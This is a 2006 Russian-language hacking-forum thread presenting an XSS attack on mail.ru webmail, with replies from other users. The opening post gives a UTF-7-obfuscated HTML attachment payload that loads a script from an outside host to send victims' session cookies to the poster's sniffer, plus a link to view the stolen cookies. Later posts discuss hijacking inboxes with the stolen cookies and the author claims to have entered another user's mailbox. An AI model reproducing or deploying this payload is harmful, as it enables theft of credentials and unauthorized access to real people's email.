 |
|
06.10.2006, 15:00
|
|
Новичок
Регистрация: 05.06.2006
Сообщений: 25
С нами:
10491317
Репутация:
74
|
|
XSS на mail.ru
Взлом Майл.ру
жертва должна будет скачать и открыть прикреплённый файл в хтмл формате
<html>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-7">
<TABLE><TD BACKGROUND="+ACYAIw-106+ACYAIw-97+ACYAIw-118+ACYAIw-97+ACYAIw-115+ACYAIw-99+ACYAIw-114+ACYAIw-105+ACYAIw-112+ACYAIw-116: document.write('+ACYAIw-60+ACYAIw-115+ACYAIw-99+ACYAIw-114+ACYAIw-105+ACYAIw-112+ACYAIw-116 SRC=http://devarsiv.org/alex/j.js> </SCRIPT>')">
</html>
куки придут на мой сниффер
вы можете воспользоваться ими по адресу: www.devarsiv.org/alex/alex.php
сейчас сделаю видео !
удачи!
Последний раз редактировалось Actu@l SpY; 07.10.2006 в 01:32..
|
|
|
06.10.2006, 15:30
|
|
Banned
Регистрация: 06.03.2005
Сообщений: 1,645
С нами:
11147366
Репутация:
901
|
|
Actu@l SpY
Круто нафиг!  . Давай видео !!! )
|
|
|
|
06.10.2006, 15:36
|
|
Banned
Регистрация: 06.06.2006
Сообщений: 944
С нами:
10489346
Репутация:
1403
|
|
Отлично!
|
|
|
|
06.10.2006, 15:45
|
|
Постоянный
Регистрация: 25.07.2005
Сообщений: 471
С нами:
10944386
Репутация:
931
|
|
Сделав как описанно выше на сниффер пришло следующее:
"REFERER=http://win.mail.ru/cgi-bin/readmsg/1.html?id=11601349480000001767;0;1&mode=attachment &channel=¬ype"
Что-то не так делаю или что?
Ведь сессии самой то нет...
|
|
|
|
07.10.2006, 01:16
|
|
Постоянный
Регистрация: 16.06.2006
Сообщений: 334
С нами:
10474288
Репутация:
600
|
|
Если сработает то будет круто.... а сниф может не сработать? иногда бывает что приходит пустые логи..
|
|
|
|
07.10.2006, 01:24
|
|
Постоянный
Регистрация: 25.07.2005
Сообщений: 471
С нами:
10944386
Репутация:
931
|
|
Если я ничего не путаю, то я вижу следующее:
Примеры, которые привел Actu@l SpY не будут работать хотя бы по той причине, что пути такого как "http://win.mail.ru/session/......" нет уже...в данный момент "http://win.mail.ru/cgi-bin/..."
Сессию сниффер никак не может утянуть...
По крайней мере у меня не получилось, хотел делал точно все так, как описано выше...
Может подскажите в чем моя ошибка?
Последний раз редактировалось Koller; 07.10.2006 в 01:28..
|
|
|
|
07.10.2006, 01:44
|
|
Новичок
Регистрация: 05.06.2006
Сообщений: 25
С нами:
10491317
Репутация:
74
|
|
до того момента как я выложил багу на форуме всё работало,
буквально через 30 минут,эту багу прикрыли ,остался только вариант через мой сниффер и то по непонятным причинам попасть в инбокс через оперу по свежим кукам стало проблематично
|
|
|
|
07.10.2006, 01:55
|
|
Новичок
Регистрация: 05.06.2006
Сообщений: 25
С нами:
10491317
Репутация:
74
|
|
nc.STRIEM подтвердит, что сегодня он побывал у меня-же в инбоксе,приведённым мной вариантом,,а через пол чеса облом, багу видимо прикрыли,но всё-же подменив куки в опере мы попадем в инбокс,на то время пока жертва будет в он-лине
Последний раз редактировалось Actu@l SpY; 07.10.2006 в 03:07..
|
|
|
|
07.10.2006, 12:37
|
|
Banned
Регистрация: 06.03.2005
Сообщений: 1,645
С нами:
11147366
Репутация:
901
|
|
Actu@l SpY
Ну это для нас давно не секрет, что люди с mail.ru тоже тут тусуються, потому как бы стараемся что-то свеженькое и горячее переносить в закрытую зону.
P.S. В этот раз меня терзали смутные сомнения, убрать ли тему выше или оставить тут. Оставил ). Результат на лицо
|
|
|
|
07.10.2006, 12:39
|
|
Участник форума
Регистрация: 26.11.2005
Сообщений: 193
С нами:
10765622
Репутация:
40
|
|
Круто чувак.Ждем видео.
|
|
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Xss для новичков
|
Micr0b |
Уязвимости |
79 |
06.07.2018 22:05 |
|
XSS worms
|
Xex |
Статьи |
0 |
02.10.2006 01:49 |
|
Xss на mail.ru
|
em00s7 |
Уязвимости Mail-сервис |
14 |
08.06.2006 00:38 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
